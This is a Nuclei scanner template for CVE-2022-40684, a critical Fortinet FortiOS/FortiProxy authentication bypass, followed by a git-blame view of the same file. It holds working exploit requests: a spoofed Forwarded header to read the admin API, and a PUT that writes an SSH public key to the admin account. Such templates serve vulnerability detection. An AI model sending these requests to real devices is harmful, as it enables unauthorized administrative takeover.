nuclei-templates/http/cves/2022/CVE-2022-40684.yaml

id: CVE-2022-40684

info:
  name: Fortinet - Authentication Bypass
  author: Shockwave,nagli,carlosvieira
  severity: critical
  description: |
    Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
  remediation: |
    Apply the necessary security patches or firmware updates provided by Fortinet to mitigate this vulnerability.
  reference:
    - https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py
    - https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/
    - https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684
    - https://nvd.nist.gov/vuln/detail/CVE-2022-40684
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-40684
    cwe-id: CWE-287
    epss-score: 0.96782
    epss-percentile: 0.9953
    cpe: cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: fortinet
    product: fortiproxy
  tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev,intrusive

http:
  - raw:
      - |
        GET /api/v2/cmdb/system/admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Node.js
        Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host=
        X-Forwarded-Vdom: root
      - |
        PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Report Runner
        Content-Type: application/json
        Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
        Content-Length: 610

         {
          "ssh-public-key1":"{{randstr}}"
        }

    stop-at-first-match: true
    req-condition: true

    matchers-condition: or
    matchers:
      - type: word
        part: body_1
        words:
          - ENC XXXX
          - http_method
        condition: and

      - type: word
        part: body_2
        words:
          - Invalid SSH public key.
          - cli_error
        condition: and
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`id: CVE-2022-40684`

			`info:`
Dashboard Content Enhancements (#5704) Dashboard Content Enhancements 2022-10-19 21:11:27 +00:00			`name: Fortinet - Authentication Bypass`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`author: Shockwave,nagli,carlosvieira`
			`severity: critical`
			`description: \|`
Dashboard Content Enhancements (#5704) Dashboard Content Enhancements 2022-10-19 21:11:27 +00:00			`Fortinet contains an authentication bypass vulnerability via using an alternate path or channel in FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy 7.2.0 and 7.0.0 through 7.0.6, and FortiSwitchManager 7.2.0 and 7.0.0. An attacker can perform operations on the administrative interface via specially crafted HTTP or HTTPS requests, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`remediation: \|`
			`Apply the necessary security patches or firmware updates provided by Fortinet to mitigate this vulnerability.`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`reference:`
			`- https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py`
			`- https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/`
			`- https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684`
Dashboard Content Enhancements (#5704) Dashboard Content Enhancements 2022-10-19 21:11:27 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2022-40684`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`classification:`
Auto Generated CVE annotations [Fri Oct 21 08:16:09 UTC 2022] :robot: 2022-10-21 08:16:09 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
Auto Generated CVE annotations [Tue Oct 25 14:05:39 UTC 2022] :robot: 2022-10-25 14:05:39 +00:00			`cvss-score: 9.8`
			`cve-id: CVE-2022-40684`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`cwe-id: CWE-287`
			`epss-score: 0.96782`
			`epss-percentile: 0.9953`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`cpe: cpe:2.3:a:fortinet:fortiproxy::::::::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: fortinet`
			`product: fortiproxy`
			`tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev,intrusive`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`- raw:`
			`- \|`
			`GET /api/v2/cmdb/system/admin HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Node.js`
			`Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host=`
			`X-Forwarded-Vdom: root`
			`- \|`
			`PUT /api/v2/cmdb/system/admin/admin HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Report Runner`
			`Content-Type: application/json`
			`Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;`
			`Content-Length: 610`

Dashboard Content Enhancements (#5704) Dashboard Content Enhancements 2022-10-19 21:11:27 +00:00			`{`
			`"ssh-public-key1":"{{randstr}}"`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`}`

			`stop-at-first-match: true`
			`req-condition: true`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`matchers-condition: or`
			`matchers:`
			`- type: word`
			`part: body_1`
			`words:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- ENC XXXX`
			`- http_method`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`condition: and`

			`- type: word`
			`part: body_2`
			`words:`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- Invalid SSH public key.`
			`- cli_error`
Added CVE-2022-40684 (Fortigate - Authentication bypass) (#5672) * Added CVE-2022-40684 (Fortigate - Authentication bypass) * Update CVE-2022-40684.yaml * option update Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> 2022-10-14 09:09:38 +00:00			`condition: and`